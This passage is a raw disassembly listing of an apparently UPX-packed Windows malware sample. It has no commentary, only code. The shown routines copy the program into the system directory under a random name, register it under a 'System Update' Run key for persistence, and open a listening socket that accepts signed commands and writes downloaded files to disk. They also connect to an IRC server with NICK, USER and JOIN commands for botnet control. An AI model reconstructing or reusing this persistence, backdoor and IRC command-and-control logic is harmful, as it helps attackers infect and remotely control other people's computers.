loc_315025C3: ; CODE XREF: sub_31502523+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_3150258C
pop edi
pop esi
pop ebx
leave
retn
sub_31502523 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025D1 proc near ; CODE XREF: sub_3150269D+D1�p
; sub_3150269D+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_315025E6
push [ebp+arg_0]
call dword_31501098 ; DeleteFileA
loc_315025E6: ; CODE XREF: sub_315025D1+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_3150269B
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset asc_31505CE0 ; "\\"
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31502418
add esp, 14h
push ds:dword_31506154
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_315010F0 ; ExitProcess
pop esi
locret_3150269B: ; CODE XREF: sub_315025D1+23�j
leave
retn
sub_315025D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150269D proc near ; CODE XREF: UPX0:31501D57�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027D6
and ds:dword_31506190, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502723
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aXjalpgncplisib ; "xjalpgncplisibz"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31502418
add esp, 14h
jmp short loc_31502732
; ---------------------------------------------------------------------------
loc_31502723: ; CODE XREF: sub_3150269D+4D�j
lea eax, [ebp+var_20]
push eax
push offset aXjalpgncplisib ; "xjalpgncplisibz"
call dword_31501088 ; lstrcpy
loc_31502732: ; CODE XREF: sub_3150269D+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502778
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31502418
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025D1
add esp, 1Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_31502778: ; CODE XREF: sub_3150269D+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpi
test eax, eax
jnz short loc_315027C1
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315027D6
push ebx
push edi
push esi
mov ds:dword_31506190, 1
call sub_3150238A
add esp, 0Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_315027C1: ; CODE XREF: sub_3150269D+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025D1
pop ecx
pop ecx
loc_315027D6: ; CODE XREF: sub_3150269D+1F�j
; sub_3150269D+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_3150269D endp
; =============== S U B R O U T I N E =======================================
sub_315027DB proc near ; CODE XREF: sub_31501B9B+7A�p
; sub_31502889+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_315027DB endp
; =============== S U B R O U T I N E =======================================
sub_315027EF proc near ; CODE XREF: sub_31502889+EB�p
; sub_31502B27+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_315027EF endp
; =============== S U B R O U T I N E =======================================
sub_31502801 proc near ; CODE XREF: sub_31502B27+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpy
mov eax, esi
pop esi
retn
sub_31502801 endp
; =============== S U B R O U T I N E =======================================
sub_3150281A proc near ; CODE XREF: sub_31502B27+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 1
pop eax
jmp short loc_31502869
; ---------------------------------------------------------------------------
loc_31502849: ; CODE XREF: sub_3150281A+1B�j
; sub_3150281A+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CE8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31502869: ; CODE XREF: sub_3150281A+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150281A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150286E proc near ; CODE XREF: sub_31502B27+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3150286E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502889 proc near ; CODE XREF: sub_31502B27+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_315027DB
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A1E ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150296A
jl short loc_315028F7
cmp ecx, 61C46800h
ja short loc_3150296A
loc_315028F7: ; CODE XREF: sub_31502889+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150296A
jg short loc_31502906
cmp ecx, 9E3B9800h
jb short loc_3150296A
loc_31502906: ; CODE XREF: sub_31502889+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_3150295B
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_3150295B
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3150295B
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31502983
loc_3150295B: ; CODE XREF: sub_31502889+98�j
; sub_31502889+AA�j ...
call dword_3150109C ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150296A: ; CODE XREF: sub_31502889+62�j
; sub_31502889+6C�j ...
call dword_3150109C ; RtlGetLastWin32Error
push 2
pop esi
loc_31502973: ; CODE XREF: sub_31502889+117�j
push edi
call sub_315027EF
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31502983: ; CODE XREF: sub_31502889+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502973
sub_31502889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029A2 proc near ; CODE XREF: sub_31502B27+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029C1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B19
; ---------------------------------------------------------------------------
loc_315029C1: ; CODE XREF: sub_315029A2+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AD2
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpyn
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AC0
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A68
inc [ebp+arg_4]
loc_31502A68: ; CODE XREF: sub_315029A2+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502AB5
loc_31502A72: ; CODE XREF: sub_315029A2+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502AB5
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A72
loc_31502AB5: ; CODE XREF: sub_315029A2+CE�j
; sub_315029A2+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B22
; ---------------------------------------------------------------------------
loc_31502AC0: ; CODE XREF: sub_315029A2+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AD2: ; CODE XREF: sub_315029A2+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B01
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B01: ; CODE XREF: sub_315029A2+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B22
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B19: ; CODE XREF: sub_315029A2+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B22: ; CODE XREF: sub_315029A2+11C�j
; sub_315029A2+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B27 proc near ; DATA XREF: sub_31502BC3+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_315027DB
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502801
lea ecx, [ebp+var_18]
call sub_3150281A
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_31502889
test eax, eax
jnz short loc_31502B9B
loc_31502B76: ; CODE XREF: sub_31502B27+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502B9B
test eax, eax
jz short loc_31502B9B
push eax
push edi
push [ebp+var_30]
call sub_315029A2
add esp, 0Ch
jmp short loc_31502B76
; ---------------------------------------------------------------------------
loc_31502B9B: ; CODE XREF: sub_31502B27+4D�j
; sub_31502B27+5F�j ...
push edi
call sub_315027EF
pop ecx
lea ecx, [ebp+var_18]
call sub_3150286E
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BC3 proc near ; DATA XREF: sub_31501D89+13E�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502BF4: ; CODE XREF: sub_31502BC3+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C1E
inc esi
cmp esi, 0Ah
jl short loc_31502BF4
loc_31502C1E: ; CODE XREF: sub_31502BC3+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C2F: ; CODE XREF: sub_31502BC3+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_31501090 ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B27
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501094 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C2F
sub_31502BC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502C92 proc near ; CODE XREF: sub_31502D17+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CC5
add ebx, 1Ah
loc_31502CC5: ; CODE XREF: sub_31502C92+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502CEF
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502CEF: ; CODE XREF: sub_31502C92+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D0F
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502D0F: ; CODE XREF: sub_31502C92+68�j
mov al, [ebp+arg_0]
loc_31502D12: ; CODE XREF: sub_31502C92+5B�j
; sub_31502C92+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D17 proc near ; CODE XREF: sub_315036FD+F7�p
; sub_315036FD+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D72
mov edi, [ebp+arg_0]
push ebx
loc_31502D2C: ; CODE XREF: sub_31502D17+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502C92
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D56
cmp bl, 7Ah
jg short loc_31502D56
movsx esi, bl
sub esi, 61h
loc_31502D56: ; CODE XREF: sub_31502D17+32�j
; sub_31502D17+37�j
cmp bl, 41h
jl short loc_31502D66
cmp bl, 5Ah
jg short loc_31502D66
movsx esi, bl
sub esi, 41h
loc_31502D66: ; CODE XREF: sub_31502D17+42�j
; sub_31502D17+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D2C
pop ebx
jmp short loc_31502D75
; ---------------------------------------------------------------------------
loc_31502D72: ; CODE XREF: sub_31502D17+F�j
mov edi, [ebp+arg_0]
loc_31502D75: ; CODE XREF: sub_31502D17+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D17 endp
; =============== S U B R O U T I N E =======================================
sub_31502D7C proc near ; CODE XREF: UPX0:31503449�p
push esi
mov esi, ecx
push 20001h
call sub_315027DB
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502D7C endp
; =============== S U B R O U T I N E =======================================
sub_31502D91 proc near ; CODE XREF: UPX0:315034A9�p
; UPX0:315034FC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpyn
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502D91 endp
; ---------------------------------------------------------------------------
loc_31502DAF: ; CODE XREF: UPX0:31503AB6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_315027EF
push dword ptr [esi+2Ch]
call sub_315027EF
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DC7 proc near ; CODE XREF: UPX0:315034C7�p
; UPX0:3150351A�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; htons
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FCC
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502EF0: ; CODE XREF: sub_31502DC7+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F79
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FCC
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502EF0
; ---------------------------------------------------------------------------
loc_31502F79: ; CODE XREF: sub_31502DC7+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FDA
loc_31502FCC: ; CODE XREF: sub_31502DC7+4E�j
; sub_31502DC7+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31502FFC
; ---------------------------------------------------------------------------
loc_31502FDA: ; CODE XREF: sub_31502DC7+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31502FFC: ; CODE XREF: sub_31502DC7+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503009 proc near ; CODE XREF: sub_31502DC7+7C�p
; sub_31502DC7+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503083
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlen
dec eax
cmp eax, 63h
jle short loc_31503042
push 1
pop eax
jmp short loc_31503085
; ---------------------------------------------------------------------------
loc_31503042: ; CODE XREF: sub_31503009+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpyn
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_31503083: ; CODE XREF: sub_31503009+20�j
xor eax, eax
loc_31503085: ; CODE XREF: sub_31503009+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31503009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150308C proc near ; CODE XREF: UPX0:31503568�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_31503155
test eax, eax
jz short loc_31503155
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150312E
push 3
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_3150312E: ; CODE XREF: sub_3150308C+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503142
push 4
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_31503142: ; CODE XREF: sub_3150308C+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpyn
xor eax, eax
jmp short loc_31503158
; ---------------------------------------------------------------------------
loc_31503155: ; CODE XREF: sub_3150308C+74�j
; sub_3150308C+78�j
push 2
loc_31503157: ; CODE XREF: sub_3150308C+A0�j
; sub_3150308C+B4�j
pop eax
loc_31503158: ; CODE XREF: sub_3150308C+C7�j
pop edi
pop esi
leave
retn 4
sub_3150308C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150315E proc near ; CODE XREF: sub_315031C7+83�p
; UPX0:315035C4�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
